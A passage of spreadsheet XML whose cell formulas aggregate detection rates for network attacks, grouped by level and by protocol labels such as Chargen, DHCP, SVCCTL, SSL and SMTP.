        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0</v>
      </c>
      <c r="EG24" s="337">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0</v>
      </c>
      <c r="EJ24" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ16&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ16*'(B) - Detecciones - Ataques'!HN16/('(B) - Detecciones - Ataques'!HN16+'(B) - Detecciones - Ataques'!HO16),0)</f>
        <v>0</v>
      </c>
      <c r="EK24" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ16&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ16*'(B) - Detecciones - Ataques'!HO16/('(B) - Detecciones - Ataques'!HN16+'(B) - Detecciones - Ataques'!HO16),0)</f>
        <v>0</v>
      </c>
      <c r="EM24" s="571"/>
      <c r="EO24" s="422" t="s">
        <v>558</v>
      </c>
      <c r="EP24" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO24)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO24 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="EQ24" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO24)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO24 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="ER24" s="623">
        <f t="shared" si="13"/>
        <v>0.5</v>
      </c>
      <c r="EW24" s="379" t="s">
        <v>633</v>
      </c>
      <c r="EX24" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW24)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW24 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW24)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW24 &amp; "*"))</f>
        <v>0.8522727273</v>
      </c>
      <c r="EY24" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW24)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW24 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW24)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW24 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="EZ24" s="621"/>
      <c r="FE24" s="173"/>
      <c r="FF24" s="173"/>
      <c r="FG24" s="173"/>
      <c r="FH24" s="173"/>
      <c r="FN24" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"Chargen")</f>
        <v>Chargen</v>
      </c>
      <c r="FO24" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN24)</f>
        <v>0</v>
      </c>
      <c r="FP24" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN24)</f>
        <v>0</v>
      </c>
      <c r="FQ24" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN24)</f>
        <v>0</v>
      </c>
      <c r="FR24" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN24)</f>
        <v>1</v>
      </c>
    </row>
    <row r="25">
      <c r="D25" s="340" t="s">
        <v>2676</v>
      </c>
      <c r="E25" s="341" t="s">
        <v>2671</v>
      </c>
      <c r="EC25" s="655" t="s">
        <v>292</v>
      </c>
      <c r="ED25" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EE25" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.3333333333</v>
      </c>
      <c r="EF25" s="561" t="s">
        <v>12</v>
      </c>
      <c r="EG25" s="629" t="s">
        <v>12</v>
      </c>
      <c r="EJ25" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ17&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ17*'(B) - Detecciones - Ataques'!HN17/('(B) - Detecciones - Ataques'!HN17+'(B) - Detecciones - Ataques'!HO17),0)</f>
        <v>0</v>
      </c>
      <c r="EK25" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ17&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ17*'(B) - Detecciones - Ataques'!HO17/('(B) - Detecciones - Ataques'!HN17+'(B) - Detecciones - Ataques'!HO17),0)</f>
        <v>0</v>
      </c>
      <c r="EM25" s="571"/>
      <c r="EW25" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="EX25" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW25)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW25 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW25)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW25 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="EY25" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW25)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW25 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW25)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW25 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="EZ25" s="621"/>
      <c r="FE25" s="173"/>
      <c r="FF25" s="173"/>
      <c r="FG25" s="173"/>
      <c r="FH25" s="173"/>
      <c r="FN25" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DHCP")</f>
        <v>DHCP</v>
      </c>
      <c r="FO25" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN25)</f>
        <v>0</v>
      </c>
      <c r="FP25" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN25)</f>
        <v>0</v>
      </c>
      <c r="FQ25" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN25)</f>
        <v>0</v>
      </c>
      <c r="FR25" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN25)</f>
        <v>2</v>
      </c>
    </row>
    <row r="26">
      <c r="D26" s="660">
        <f>AVERAGE('(B) - Detecciones - Ataques'!HQ3:HQ139)</f>
        <v>0.3455053603</v>
      </c>
      <c r="E26" s="648">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HQ3:HQ139)</f>
        <v>0.5378890268</v>
      </c>
      <c r="EC26" s="688" t="s">
        <v>558</v>
      </c>
      <c r="ED26" s="689">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.3333333333</v>
      </c>
      <c r="EE26" s="690">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EF26" s="690">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0</v>
      </c>
      <c r="EG26" s="614">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.2727272727</v>
      </c>
      <c r="EJ26" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ18&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ18*'(B) - Detecciones - Ataques'!HN18/('(B) - Detecciones - Ataques'!HN18+'(B) - Detecciones - Ataques'!HO18),0)</f>
        <v>0</v>
      </c>
      <c r="EK26" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ18&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ18*'(B) - Detecciones - Ataques'!HO18/('(B) - Detecciones - Ataques'!HN18+'(B) - Detecciones - Ataques'!HO18),0)</f>
        <v>0</v>
      </c>
      <c r="EM26" s="571"/>
      <c r="EO26" s="42" t="s">
        <v>2680</v>
      </c>
      <c r="EP26" s="417">
        <f t="shared" ref="EP26:EQ26" si="26">SUM(EP9:EP24)</f>
        <v>56</v>
      </c>
      <c r="EQ26" s="417">
        <f t="shared" si="26"/>
        <v>93</v>
      </c>
      <c r="ER26" s="69">
        <f t="shared" ref="ER26:ER27" si="27">EP26/EQ26</f>
        <v>0.6021505376</v>
      </c>
      <c r="EW26" s="379" t="s">
        <v>244</v>
      </c>
      <c r="EX26" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW26)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW26 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW26)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW26 &amp; "*"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="EY26" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW26)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW26 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW26)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW26 &amp; "*"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="EZ26" s="621"/>
      <c r="FE26" s="173"/>
      <c r="FF26" s="173"/>
      <c r="FG26" s="173"/>
      <c r="FH26" s="173"/>
      <c r="FN26" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SVCCTL")</f>
        <v>SVCCTL</v>
      </c>
      <c r="FO26" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN26)</f>
        <v>0.2727272727</v>
      </c>
      <c r="FP26" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN26)</f>
        <v>0.2727272727</v>
      </c>
      <c r="FQ26" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN26)</f>
        <v>1</v>
      </c>
      <c r="FR26" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN26)</f>
        <v>1</v>
      </c>
    </row>
    <row r="27">
      <c r="EJ27" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ19&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ19*'(B) - Detecciones - Ataques'!HN19/('(B) - Detecciones - Ataques'!HN19+'(B) - Detecciones - Ataques'!HO19),0)</f>
        <v>0</v>
      </c>
      <c r="EK27" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ19&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ19*'(B) - Detecciones - Ataques'!HO19/('(B) - Detecciones - Ataques'!HN19+'(B) - Detecciones - Ataques'!HO19),0)</f>
        <v>1</v>
      </c>
      <c r="EM27" s="571"/>
      <c r="EO27" s="42" t="s">
        <v>2681</v>
      </c>
      <c r="EP27" s="417">
        <f>EQ26-EP26</f>
        <v>37</v>
      </c>
      <c r="EQ27" s="417">
        <f>EQ26</f>
        <v>93</v>
      </c>
      <c r="ER27" s="69">
        <f t="shared" si="27"/>
        <v>0.3978494624</v>
      </c>
      <c r="EW27" s="379" t="s">
        <v>427</v>
      </c>
      <c r="EX27" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW27)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW27 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW27)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW27 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="EY27" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW27)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW27 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW27)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW27 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="EZ27" s="621"/>
      <c r="FE27" s="173"/>
      <c r="FF27" s="173"/>
      <c r="FG27" s="173"/>
      <c r="FH27" s="173"/>
      <c r="FN27" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSL")</f>
        <v>SSL</v>
      </c>
      <c r="FO27" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN27)</f>
        <v>1</v>
      </c>
      <c r="FP27" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN27)</f>
        <v>1</v>
      </c>
      <c r="FQ27" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN27)</f>
        <v>1</v>
      </c>
      <c r="FR27" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN27)</f>
        <v>1</v>
      </c>
    </row>
    <row r="28">
      <c r="EJ28" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ20&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ20*'(B) - Detecciones - Ataques'!HN20/('(B) - Detecciones - Ataques'!HN20+'(B) - Detecciones - Ataques'!HO20),0)</f>
        <v>0</v>
      </c>
      <c r="EK28" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ20&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ20*'(B) - Detecciones - Ataques'!HO20/('(B) - Detecciones - Ataques'!HN20+'(B) - Detecciones - Ataques'!HO20),0)</f>
        <v>0</v>
      </c>
      <c r="EM28" s="571"/>
      <c r="EW28" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="EX28" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW28)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW28 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW28)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW28 &amp; "*"))</f>
        <v>0.368431225</v>
      </c>
      <c r="EY28" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW28)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW28 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW28)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW28 &amp; "*"))</f>
        <v>0.4210526316</v>
      </c>
      <c r="EZ28" s="621"/>
      <c r="FE28" s="173"/>
      <c r="FF28" s="173"/>
      <c r="FG28" s="173"/>
      <c r="FH28" s="173"/>
      <c r="FN28" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMTP")</f>
        <v>SMTP</v>
      </c>
      <c r="FO28" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN28)</f>
        <v>0</v>
      </c>
      <c r="FP28" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN28)</f>
        <v>0</v>
      </c>
      <c r="FQ28" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN28)</f>
        <v>0</v>
      </c>
      <c r="FR28" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN28)</f>
        <v>1</v>
      </c>
    </row>
    <row r="29">
      <c r="D29" s="573"/>
      <c r="E29" s="573"/>
